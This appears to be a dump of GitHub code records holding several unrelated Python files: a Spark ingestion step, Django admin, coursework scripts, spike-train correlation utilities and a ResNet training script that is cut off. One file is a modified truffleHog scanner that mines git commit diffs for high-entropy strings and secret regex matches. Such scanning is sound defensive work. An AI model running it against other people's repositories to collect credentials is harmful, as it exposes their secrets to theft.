ingestion_races_df.withColumn('race_timestamp', to_timestamp(concat(col('date'),lit(' '), col('time')), 'yyyy-MM-dd HH:mm:ss'))\n\n# COMMAND ----------\n\nfinal_races_df = transform_races_df.select(col('race_Id'),col('race_year'),col('round'),col('circuit_Id'),col('name'),col('race_timestamp'),col('ingestion_date'))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### Step 6 - Write to file (PARTITIONED!)\n# MAGIC Partitioned data EXTREMELY USEFUL for Spark, because it allows for parallel processing making full use of cluster architecture. \n\n# COMMAND ----------\n\nfinal_races_df.write.mode('overwrite').partitionBy('race_year').parquet(f\"{processed_folder_path}/races\")\n","repo_name":"M1sterDonut/Azure-Databricks-Spark-Core-For-Data-Engineers-Python-SQL-","sub_path":"formula1/ingestion/2.ingest_races_file.py","file_name":"2.ingest_races_file.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16826782311","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport math\nimport datetime\nimport argparse\nimport os\nimport json\nimport stat\nimport time\nimport re\nfrom regexChecks import regexes_txt, regexes_fs\nfrom git import Repo\n\nBASE64_CHARS = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\nHEX_CHARS = \"1234567890abcdefABCDEF\"\n\n# Get current date\nCURR_TIME = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\n\n\ndef str2bool(v):\n if not v:\n return True\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n\ndef del_rw(action, name, exc):\n os.chmod(name, stat.S_IWRITE)\n os.remove(name)\n\n\ndef shannon_entropy(data, iterator):\n \"\"\"\n Borrowed from http://blog.dkbza.org/2007/05/scanning-data-for-entropy-anomalies.html\n \"\"\"\n if not data:\n return 0\n entropy = 0\n for x in iterator:\n p_x = float(data.count(x))/len(data)\n if p_x > 0:\n entropy += - p_x*math.log(p_x, 2)\n return entropy\n\n\ndef get_strings_of_set(word, char_set, threshold=20):\n count = 0\n letters = \"\"\n strings = []\n for char in word:\n if char in char_set:\n letters += char\n count += 1\n else:\n if count > threshold:\n strings.append(letters)\n letters = \"\"\n count = 0\n if count > threshold:\n strings.append(letters)\n return strings\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef print_results(printJson, issue):\n commit_time = issue['date']\n branch_name = issue['branch']\n prev_commit = issue['commit']\n printableDiff = issue['printDiff']\n commitHash = issue['commitHash']\n reason = issue['reason']\n path = issue['path']\n\n if printJson:\n print(json.dumps(issue, sort_keys=True, indent=4))\n else:\n print(\"~~~~~~~~~~~~~~~~~~~~~\")\n reason = \"{}Reason: {}{}\".format(bcolors.OKGREEN, reason, bcolors.ENDC)\n print(reason)\n dateStr = \"{}Date: {}{}\".format(bcolors.OKGREEN, commit_time, bcolors.ENDC)\n print(dateStr)\n hashStr = \"{}Hash: {}{}\".format(bcolors.OKGREEN, commitHash, bcolors.ENDC)\n print(hashStr)\n filePath = \"{}Filepath: {}{}\".format(bcolors.OKGREEN, path, bcolors.ENDC)\n print(filePath)\n\n if sys.version_info >= (3, 0):\n branchStr = \"{}Branch: {}{}\".format(bcolors.OKGREEN, branch_name, bcolors.ENDC)\n print(branchStr)\n commitStr = \"{}Commit: {}{}\".format(bcolors.OKGREEN, prev_commit, bcolors.ENDC)\n print(commitStr)\n print(printableDiff)\n else:\n branchStr = \"{}Branch: {}{}\".format(bcolors.OKGREEN, branch_name.encode('utf-8'), bcolors.ENDC)\n print(branchStr)\n commitStr = \"{}Commit: {}{}\".format(bcolors.OKGREEN, prev_commit.encode('utf-8'), bcolors.ENDC)\n print(commitStr)\n print(printableDiff.encode('utf-8'))\n print(\"~~~~~~~~~~~~~~~~~~~~~\")\n\n\ndef find_entropy(printableDiff, commit_time, branch_name, prev_commit, blob, commitHash, git_url, json_repos):\n stringsFound = []\n lines = printableDiff.split(\"\\n\")\n for line in lines:\n for word in line.split():\n base64_strings = get_strings_of_set(word, BASE64_CHARS)\n hex_strings = get_strings_of_set(word, HEX_CHARS)\n for string in base64_strings:\n b64Entropy = shannon_entropy(string, BASE64_CHARS)\n if b64Entropy > 4.5:\n stringsFound.append(string)\n printableDiff = printableDiff.replace(string, bcolors.WARNING + string + bcolors.ENDC)\n for string in hex_strings:\n hexEntropy = shannon_entropy(string, HEX_CHARS)\n if hexEntropy > 3:\n stringsFound.append(string)\n printableDiff = printableDiff.replace(string, bcolors.WARNING + string + bcolors.ENDC)\n entropicDiff = None\n if len(stringsFound) > 0:\n entropicDiff = {}\n entropicDiff['gitUrl'] = git_url\n entropicDiff['gitSlug'] = json_repos[git_url]['slug']\n entropicDiff['project'] = json_repos[git_url]['project']\n entropicDiff['projectName'] = json_repos[git_url]['project_name']\n entropicDiff['language'] = json_repos[git_url]['language']\n entropicDiff['date'] = commit_time\n entropicDiff['creation_date'] = CURR_TIME\n entropicDiff['path'] = blob.b_path if blob.b_path else blob.a_path\n entropicDiff['author'] = prev_commit.committer if prev_commit.committer else prev_commit.author.email\n entropicDiff['branch'] = branch_name\n entropicDiff['type'] = 'Entropy'\n entropicDiff['commit'] = prev_commit.message\n entropicDiff['diff'] = blob.diff.decode('utf-8', errors='replace')\n entropicDiff['stringsFound'] = stringsFound\n entropicDiff['printDiff'] = printableDiff\n entropicDiff['commitHash'] = commitHash\n entropicDiff['reason'] = \"High Entropy\"\n return entropicDiff\n\n\ndef idx_bound_verification(bound, idx, printableDiff):\n \"\"\"\n Check if expanded boundaries in git diff are True\n :param bound:\n :param idx:\n :param printableDiff:\n :return:\n \"\"\"\n lower_idx, upper_idx = (index - bound for index in idx)\n lower_boundary, upper_boundary = False, False\n while not lower_boundary:\n try:\n printableDiff[lower_idx]\n lower_boundary = True\n except ValueError:\n lower_idx += 1\n while not upper_boundary:\n try:\n printableDiff[upper_idx]\n upper_boundary = True\n except ValueError:\n upper_idx -= 1\n return lower_idx, upper_idx\n\n\ndef regex_txt_check(printableDiff, commit_time, branch_name, prev_commit, blob, commitHash, git_url, json_repos):\n regex_matches = []\n # Set bound for expanded code match in git diff\n bound = 30\n for key in regexes_txt.keys():\n found_strings_search = regexes_txt[key].search(printableDiff)\n\n # for found_string in found_strings:\n # found_diff += bcolors.WARNING + str(found_string) + bcolors.ENDC + '\\n'\n # for found_string_exp in found_strings_expand:\n # found_diff_exp += bcolors.OKGREEN + str(found_string_exp) + bcolors.ENDC + '\\n'\n # if regexes_txt[key].group:\n if found_strings_search:\n # found_strings, found_strings_exp, found_strings_clr = '', '', ''\n idx = found_strings_search.regs[0]\n found_string = re.sub(r'(\\r|\\n)', '', str(printableDiff[idx[0]:idx[1]]))\n # found_strings += found_string\n # found_strings_clr += bcolors.WARNING + found_string + bcolors.ENDC\n lower_idx, upper_idx = idx_bound_verification(bound, idx, printableDiff)\n found_string_exp = re.sub(r'(\\r|\\n)', '', str(printableDiff[lower_idx:upper_idx]))\n # found_strings_exp += found_string_exp\n\n found_regex = {}\n found_regex['gitUrl'] = git_url\n found_regex['gitSlug'] = json_repos[git_url]['slug']\n found_regex['project'] = json_repos[git_url]['project']\n found_regex['projectName'] = json_repos[git_url]['project_name']\n found_regex['language'] = json_repos[git_url]['language']\n found_regex['commit_date'] = commit_time\n found_regex['audit_date'] = CURR_TIME\n try:\n found_regex['path'] = blob.a_blob.abspath if blob.a_blob.abspath else blob.a_path\n except AttributeError:\n found_regex['path'] = blob.b_blob.abspath if blob.b_blob.abspath else blob.abspath\n found_regex['branch'] = branch_name\n found_regex['commit'] = re.sub(r'(\\r|\\n)', '', prev_commit.message)\n found_regex['author'] = prev_commit.committer.name if prev_commit.committer.name else prev_commit.author.email\n diff = re.compile('(^.+?)\\n').findall(printableDiff)\n found_regex['diff'] = \"Diff details: \" + str(diff) + '\\nMatched string in diff context:\\n' + \\\n \"-----begin omitted-----\\n\" + found_string_exp + \"\\n-----end omitted-----\",\n found_regex['type'] = 'MatchStringInDiff'\n found_regex['stringsFound'] = found_string\n # found_regex['printDiff'] = ''\n found_regex['reason'] = key\n found_regex['commitHash'] = commitHash\n regex_matches.append(found_regex)\n return regex_matches\n\n\ndef regex_fs_check_tree(commit_time, branch_name, prev_commit, commitHash, git_url, json_repos):\n regex_matches = []\n for file_git in prev_commit.tree.blobs:\n for key in regexes_fs:\n repo_path = file_git.abspath.split(\"/repos/\")[-1]\n found_strings = regexes_fs[key].search(repo_path)\n if found_strings:\n # found_strings, found_strings_exp, found_strings_clr = '', '', ''\n for idx in found_strings.regs:\n found_string = re.sub(r'(\\r|\\n)', '', str(repo_path[idx[0]:idx[1]]))\n\n found_regex = {}\n found_regex['gitUrl'] = git_url\n found_regex['gitSlug'] = json_repos[git_url]['slug']\n found_regex['project'] = json_repos[git_url]['project']\n found_regex['projectName'] = json_repos[git_url]['project_name']\n found_regex['language'] = json_repos[git_url]['language']\n found_regex['commit_date'] = commit_time\n found_regex['audit_date'] = CURR_TIME\n found_regex['path'] = repo_path\n found_regex['branch'] = branch_name\n found_regex['author'] = prev_commit.committer.name if prev_commit.committer.name else prev_commit.author.email\n found_regex['commit'] = re.sub(r'(\\r|\\n)', '', prev_commit.message)\n found_regex['diff'] = ''\n found_regex['type'] = 'MatchInFilename'\n found_regex['stringsFound'] = found_string\n found_regex['reason'] = key\n found_regex['commitHash'] = commitHash\n regex_matches.append(found_regex)\n return regex_matches\n\n\n# def searchSensitiveFilesInRepo(project_path, git_url, json_repos):\n# \"\"\"\n# Deprecated function\n# :param project_path:\n# :param git_url:\n# :param json_repos:\n# :return:\n# \"\"\"\n# fs_objects = os.listdir(project_path)\n# # repo = Repo(project_path)\n# # changed = [item.a_path for item in repo.index.diff(None) ]\n# foundIssues = []\n# for fs_object in fs_objects:\n# found_regexes = regex_fs_check_tree(fs_object, git_url, json_repos)\n# foundIssues += found_regexes\n# return foundIssues\n\n\ndef find_strings(project_path, git_url, json_repos, since_commit=None, max_depth=None, do_regex=False, do_entropy=True):\n \"\"\"\n Serch sensitive data in git commit diffs\n :param project_path: string\n :param git_url: string\n :param json_repos: dictionary\n :param since_commit: integer\n :param max_depth: integer\n :param do_regex: boolean\n :param do_entropy: boolean\n :return: dictionary\n \"\"\"\n repo = Repo(project_path)\n already_searched = set()\n\n found_issues = []\n for remote_branch in repo.remotes.origin.fetch():\n since_commit_reached = False\n branch_name = remote_branch.name.split('/')[1]\n try:\n repo.git.checkout(remote_branch, b=branch_name)\n except:\n pass\n prev_commit = None\n for curr_commit in repo.iter_commits(max_count=max_depth):\n commitHash = curr_commit.hexsha\n if commitHash == since_commit:\n since_commit_reached = True\n if since_commit and since_commit_reached:\n prev_commit = curr_commit\n continue\n if not prev_commit:\n pass\n else:\n # Avoid searching the same diffs\n hashes = str(prev_commit) + str(curr_commit)\n if hashes in already_searched:\n prev_commit = curr_commit\n continue\n already_searched.add(hashes)\n\n diff = prev_commit.diff(curr_commit, create_patch=True)\n for blob in diff:\n printableDiff = blob.diff.decode('utf-8', errors='replace')\n if printableDiff.startswith(\"Binary files\"):\n continue\n commit_time = datetime.datetime.fromtimestamp(prev_commit.committed_date).strftime('%Y-%m-%d %H:%M:%S')\n foundIssues = []\n if do_entropy:\n entropicDiff = find_entropy(printableDiff, commit_time, branch_name, prev_commit, blob,\n commitHash, git_url, json_repos)\n if entropicDiff:\n foundIssues.append(entropicDiff)\n if do_regex:\n found_regexes = regex_txt_check(printableDiff, commit_time, branch_name, prev_commit, blob,\n commitHash, git_url, json_repos)\n foundIssues += found_regexes\n found_files = regex_fs_check_tree(commit_time, branch_name, prev_commit, commitHash, git_url,\n json_repos)\n foundIssues += found_files\n\n for foundIssue in foundIssues:\n # print_results(printJson, foundIssue)\n # print(\"Issue is \", foundIssue)\n found_issues.append(foundIssue)\n\n prev_commit = curr_commit\n # output[\"project_path\"] = project_path\n # shutil.rmtree(project_path, onerror=del_rw)\n return found_issues\n\n","repo_name":"unk1nd0n3/bitbucket-creds-checker","sub_path":"truffleHog/truffleHog.py","file_name":"truffleHog.py","file_ext":"py","file_size_in_byte":14263,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"} +{"seq_id":"24161288031","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .models import User\nfrom diaries.models import Flower\n\n\nclass FlowerInline(admin.TabularInline):\n model = Flower.users.through\n extra = 1\n\n\n@admin.register(User)\nclass CustomUserAdmin(UserAdmin):\n list_display = (\n \"id\",\n \"username\",\n \"flowers_count\",\n )\n ordering = (\"id\",)\n fieldsets = UserAdmin.fieldsets + (\n (\n \"social\",\n {\n \"fields\": (\n \"social\",\n \"social_id\",\n )\n },\n ),\n )\n inlines = (FlowerInline,)\n\n @admin.display()\n def flowers_count(self, obj):\n return obj.flowers.count()\n","repo_name":"minicks/FlowerDiary","sub_path":"backend/accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73849189904","text":"\"\"\" 查询学生成绩 \"\"\"\n\nimport csv\n\n\"\"\" 读入文件到list \"\"\"\nscoreFile = open(\"score.csv\",\"r\",encoding=\"utf-8-sig\")\nline = csv.reader(scoreFile,delimiter=',')\nperRow = []\nfor row in line:\n perRow.append(row)\nscoreFile.close()\n\nprint(perRow)\n\n\n\"\"\" 查找学生 \"\"\"\nname = input(\"请输入��想查询的学生姓名:\")\n\nf = 1\nfor i in range(1,4) :\n if name==perRow[i][0] :\n print(\"作业1 \"+perRow[i][1]+\" 作业2 \"+perRow[i][2]+\" 期末考试 \"+perRow[i][3]+\" 总成绩 \"+perRow[i][4])\n f = 0\nif f :\n print(\"此人不存在!\")\n","repo_name":"bbdzs/Code-for-Programming-Courses","sub_path":"编程导论(python)/作业/week13-Lab02/lab2-2.py","file_name":"lab2-2.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"29897664611","text":"from collections import deque\n\nn, k = map(int, input().split()) # n, k 입력\ntest_tube = [] # 시험관 정보 저장하는 리스트\nvirus_data = [] # 바이러스 정보 저장하는 리스트\n# 시험관 정보 입력받기\nfor i in range(n):\n test_tube.append(list(map(int, input().split())))\n for j in range(n):\n # 입력받은 행 중에 바이러스가 있다면\n if test_tube[i][j] != 0:\n # 바이러스의 번호와 시간, 위치를 바이러스 정보에 추가\n virus_data.append((test_tube[i][j], 0, i, j))\n\n# 바이러스 번호별로 오름차순 정렬 후 큐에 삽입\nvirus_data.sort()\nqueue = deque(virus_data)\n\n# 타겟 변수 입력받기\ntarget_s, target_x, target_y = map(int, input().split()) \n\n# 상하좌우 이동\ndx = [0, 0, -1, 1]\ndy = [1, -1, 0, 0]\n\n# 큐가 빌때까지 반복\nwhile queue:\n virus, s, x, y = queue.popleft()\n # s초가 지나면 중지\n if s == target_s:\n break\n # 현재 노드 기준으로 상하좌우 확인\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n # 해당 위치로 이동할 수 있는 경우\n if 0 <= nx < n and 0 <= ny < n:\n # 바이러스가 없다면\n if test_tube[nx][ny] == 0:\n # 바이러스 전파\n test_tube[nx][ny] = virus\n # 전파된 바이러스 데이터 큐에 삽입\n queue.append((virus, s + 1, nx, ny))\n\nprint(test_tube[target_x - 1][target_y - 1])\n\n# 풀이 : https://inistory.tistory.com/143","repo_name":"ShShin98/Baekjoon_CodingTest","sub_path":"dfs,bfs/#18405 경쟁적 전염(다시).py","file_name":"#18405 경쟁적 전염(다시).py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41746514740","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef get_cluster_connection_probs(REE, k, pee):\n p_out = pee * k / (REE + k - 1)\n p_in = REE * p_out\n return p_in, p_out\n\n\ndef spikes_to_binary(M):\n \"\"\"\n From SpikeMonitor object it returns a binary numpy array with\n spikes in particular time points.\n :param M: SpikeMonitor object\n :return: numpy matrix with spike times\n \"\"\"\n\n try:\n tpnts = np.arange(float(M.clock.start), float(M.clock.end), float(M.clock.dt))\n except AttributeError:\n raise AttributeError(\"SpikeMonitor doesn't contain any recordings\")\n binarr = np.zeros((len(M.spiketimes.keys()), len(tpnts)))\n for k, sp_times in M.spiketimes.items():\n if len(sp_times) == 0:\n continue\n for t_sp in sp_times:\n binarr[k][np.argmin(np.abs(t_sp - tpnts))] = 1\n return binarr\n\n\ndef spikes_counter(M, timewin):\n \"\"\"\n From SpikeMonitor object it returns a numpy array with spikes counts\n in time windows\n spikes in particular time points.\n :param M: SpikeMonitor object\n :return: numpy matrix with spike times\n \"\"\"\n try:\n tpnts = np.arange(M.clock.start, M.clock.end + 0.5 * timewin, timewin)\n except AttributeError:\n raise AttributeError(\"SpikeMonitor doesn't contain any recordings\")\n counts = np.zeros((len(M.spiketimes.keys()), len(tpnts) - 1))\n for k, sp_times in M.spiketimes.items():\n if len(sp_times) == 0:\n continue\n for t_sp in sp_times:\n idxs = np.where(tpnts >= t_sp)[0]\n if len(idxs) == 0:\n counts[k][-1] += 1\n else:\n counts[k][idxs[0] - 1] += 1\n return counts\n\n\ndef firing_rates(spike_data, time):\n 'Return firing rate for each neuron n from *spike_data*'\n return (spike_data.sum(axis=-1)).flatten() / time\n\n\ndef fano_factor(spike_data):\n \"\"\"\n Computes Fano factor from matrix *spike_data* of shape (r, k, n, m)\n where *r* - realizations, *k* - nr of trials, *n* - nr of neurons,\n *m* - time steps\n \"\"\"\n return (np.var(spike_data, axis=1)/np.mean(spike_data, axis=1)).flatten()\n\n\ndef corr_coef(trial_data):\n \"\"\"\n computes pairwise correlation coefficient form given matrix of trial data\n :param trial_data: matrix of trial data with dimension trials x neurons x timewindows.\n :return: correlation matrix rho\n \"\"\"\n\n n_trials = trial_data.shape[0]\n n_neurons = trial_data.shape[1]\n\n rho = np.zeros((n_neurons, n_neurons))\n cov = np.zeros(n_trials)\n var_factor = np.zeros(n_trials)\n\n for i in range(n_neurons):\n for j in range(i + 1):\n for t in range(n_trials):\n cov[t] = np.mean(trial_data[t, i, :] * trial_data[t, j, :]) - \\\n np.mean(trial_data[t, i, :]) * np.mean(trial_data[t, j, :])\n var_factor[t] = np.sqrt(np.mean(np.var(trial_data[t, i, :])) * np.mean(np.var(trial_data[t, j, :])))\n rho[i, j] = np.mean(cov) / np.mean(var_factor)\n rho[j, i] = rho[i, j]\n return rho\n\n\ndef corr_coef_new(trial_data):\n \"\"\"\n computes pairwise correlation coefficient form given matrix of trial data\n With numpy corrcoef instead of explicit calculations.\n :param trial_data: matrix of trial data with dimension trials x neurons x timewindows.\n :return: correlation matrix rho\n \"\"\"\n\n n_trials = trial_data.shape[0]\n n_neurons = trial_data.shape[1]\n\n rho = np.zeros((n_neurons, n_neurons))\n cov = np.zeros(n_trials)\n var_factor = np.zeros(n_trials)\n\n for i in range(n_neurons):\n for j in range(i + 1):\n for t in range(n_trials):\n cov[t] = np.corrcoef(trial_data[t,i,:], trial_data[t,j,:])[0,1]\n cov_n = cov[~np.isnan(cov)]\n rho[i, j] = np.mean(cov_n)\n rho[j, i] = rho[i, j]\n return rho\n\n\ndef extract_cluster_corr_coef(rho, k=50):\n \"\"\"\n Extracts correlation values for all clusters form correlation matrix rho.\n :param rho: correlation matrix\n :param k: number of clusters in the network\n :return: correlation matrix for every cluster: k x (neuron_pairs)\n \"\"\"\n n_neurons = rho.shape[0]\n # determine number of pairs for cluster\n neurons_per_cluster = n_neurons / k\n pairs_per_cluster = neurons_per_cluster * (neurons_per_cluster - 1) / 2.\n cluster_corr_coef = np.zeros((k, pairs_per_cluster))\n for k_idx in range(k):\n # get cluster part from corr_coef matrix\n cluster_cc = rho[(k_idx * neurons_per_cluster):(k_idx + 1) * neurons_per_cluster,\n (k_idx * neurons_per_cluster):(k_idx + 1) * neurons_per_cluster]\n # save lower triangle of current cluster corr matrix in matrix for all clusters\n cluster_corr_coef[k_idx, :] = get_lower_triangle(cluster_cc)\n # remove nans before returning\n return remove_nans(cluster_corr_coef)\n\n\ndef extract_all_corr_coef(rho):\n \"\"\"\n Extracts only relevant values from correlation matrix rho\n :param rho: correlation matrix\n :return: 1D array of correlation values\n \"\"\"\n # get lower triangle of the corr matrix as vector\n rho_vec = get_lower_triangle(rho)\n # remove nans\n return remove_nans(rho_vec)\n\n\ndef extract_random_corr_coef(rho, size):\n \"\"\"\n Extracts values of random subset of neurons pairs from correlation matrix rho\n :param rho: correlation matrix\n :param size: size of subset\n :return: 1D array of correlation values\n \"\"\"\n # get indices of random pairs\n idx = np.random.randint(0,rho.shape[0]-1, size=size)\n rho_vec = get_lower_triangle(rho)\n # remove nans\n return remove_nans(rho_vec[idx])\n\n\ndef get_lower_triangle(m):\n \"\"\"\n Extracts lower triangle of matrix, without diagonal\n :param m: matrix\n :return: lower triangle\n \"\"\"\n # get lower triangle indices without diagonal (k<0)\n i,j = np.tril_indices(m.shape[0], k=-1)\n # return entries in correlation matrix in array\n return m[i,j]\n\n\ndef remove_nans(m, keep_matrix=False):\n \"\"\"\n removes nans from a matrix. if keep_matrix is True then nans are set to zero and the matrix is returned. Else,\n a vector with all finite values of the matrix is returned.\n :param m: matrix\n :param keep_matrix: flag for keeping the structure of the matrix\n :return: matrix or vec without nans\n \"\"\"\n if keep_matrix:\n for i in range(m.shape[0]):\n # get current row and set nans to zero\n tmp = m[i, :]\n tmp[np.isnan(tmp)] = 0\n # replace row in m\n m[i, :] = tmp\n else:\n m = m[np.isfinite(m)]\n return m\n\n\ndef sample_in_cluster(nrns=4000, k=50, picked=20):\n '''\n Reduce number of neurons to *picked* in every of *k* clusters.\n :param nrns: total numer of neurons\n :param k: number of clusters\n :param picked: how many neurons pick from each cluster\n :return: indices of chosen neurons\n '''\n ncl = nrns//k # neuron in cluster\n assert ncl>picked, \"picked is too big\"\n nrnnumbers = np.arange(nrns) # indices of all neurons\n idxvec = np.zeros(k*picked) # vector with new indices\n for i in range(k):\n ix_ = np.random.choice(ncl, picked, replace=False)\n idxvec[i*picked:(i+1)*picked] = nrnnumbers[i*ncl:(i+1)*ncl][ix_]\n return idxvec.astype('int')\n\n\ndef plot_histogram(data1, data2, binwidth, xlabel=''):\n \"\"\"\n Plot histogram for two given arrays of data\n :param data1: first array\n :param data2: second array\n :param binwidth: width of the bins\n :param xlabel: string for xlabel\n :return: no return\n \"\"\"\n # plot the two array as step histogram\n bins1 = np.arange(min(data1), max(data1) + binwidth, binwidth)\n plt.hist(data1, bins=bins1, align='left', histtype='step')\n plt.axvline(data1.mean(), color='b', linestyle='dashed', linewidth=2)\n bins2 = np.arange(min(data2), max(data2) + binwidth, binwidth)\n plt.hist(data2, bins=bins2, align='left', histtype='step')\n plt.axvline(data2.mean(), color='g', linestyle='dashed', linewidth=2)\n plt.legend(['mean uni', 'mean clus', 'Uniform', 'Clustered'])\n plt.xlabel(xlabel)\n plt.ylabel('Count')\n\n\ndef plot_correlation(rho1, rho2, binwidth, title='', show=True):\n \"\"\"\n Plot correlation histograms for two given arrays. It picks the same\n number of valid values from both matrices by random.\n :param rho1: first correlation array\n :param rho2: second correlation array\n :param binwidth: width of the bins\n :param title: string for plot title\n :param show: boolean value - if True than picture is shown\n :return: no return\n \"\"\"\n min_length = min(len(rho1), len(rho2))\n rho1_pick = rho1[np.random.choice(len(rho1),size=min_length, replace=False)]\n rho2_pick = rho2[np.random.choice(len(rho2),size=min_length, replace=False)]\n plot_histogram(rho1_pick, rho2_pick, binwidth, xlabel='correlation')\n plt.title(title)\n if show:\n plt.show()\n","repo_name":"janfb/bccn_programming_project5","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12102989127","text":"# -*- coding: utf-8 -*-\n# @Author : Mumu\n# @Time : 2021/11/18 9:40\n'''\n@Function:\n \n'''\nimport os\nimport shutil\nimport time\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset, DataLoader\nimport torch\nfrom model_resnet import *\nfrom torchsummary import summary\n\n\ntorch.cuda.set_device(0)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nargs = {'lr': 0.1,\n 'prefix': 'RESNET50_IMAGENET_CBAM',\n 'arch': 'resnet',\n 'checkpoint': './checkpoints/RESNET50_IMAGENET_CBAM_checkpoint.pth.tar',\n 'start_epoch': 0,\n 'epochs': 10,\n 'Batch_size': 4}\nbest_prec1 = 0\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n lr = args['lr'] * (0.1 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass DataLoad(Dataset):\n def __init__(self, path, regno_data):\n self.path = path\n self.data = regno_data\n self.transform = transforms.Compose([transforms.ToTensor(),\n transforms.Resize((224, 224)),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])])\n\n def __getitem__(self, index):\n img_name = self.path + self.data[index][0] + '.jpg'\n img = cv2.imread(img_name)\n img = self.transform(img).to(device)\n return img, np.array(self.data[index][1], dtype='int64')\n\n def __len__(self):\n return len(self.data)\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].contiguous().view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n model.train()\n\n end = time.time()\n for i, (img, target) in enumerate(train_loader):\n data_time.update(time.time() - end)\n\n target = target.to(device)\n img_val = torch.autograd.Variable(img)\n target_val = torch.autograd.Variable(target)\n\n output = model(img_val)\n loss = criterion(output, target_val)\n\n preac1, preac5 = accuracy(output.data, target, topk=(1, 5))\n losses.update(loss.item(), img.size(0))\n top1.update(preac1[0], img.size(0))\n top5.update(preac5[0], img.size(0))\n\n optimizer.zero_grad()\n loss.backward() # 梯度反传\n optimizer.step() # 保留梯度\n\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, i, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n\n\ndef validate(val_loader, model, criterion, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input_var = torch.autograd.Variable(input, volatile=True)\n target_var = torch.autograd.Variable(target, volatile=True)\n\n # compute output\n output = model(input_var)\n loss = criterion(output, target_var)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n losses.update(loss.item(), input.size(0))\n top1.update(prec1[0], input.size(0))\n top5.update(prec5[0], input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % 100 == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print(' * Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5))\n\n return top1.avg\n\n\ndef save_checkpoint(state, is_best, prefix):\n filename = './checkpoints/%s_checkpoint.pth.tar' % prefix\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, './checkpoints/%s_model_best.pth.tar' % prefix)\n\n\ndef main():\n global best_prec1\n from tensorboardX import SummaryWriter\n data_df = pd.read_csv('./data/index.csv')\n\n train_data = data_df.sample(frac=0.8)\n val_data = data_df.sample(frac=0.2)\n train_data = np.array(train_data).tolist()\n val_data = 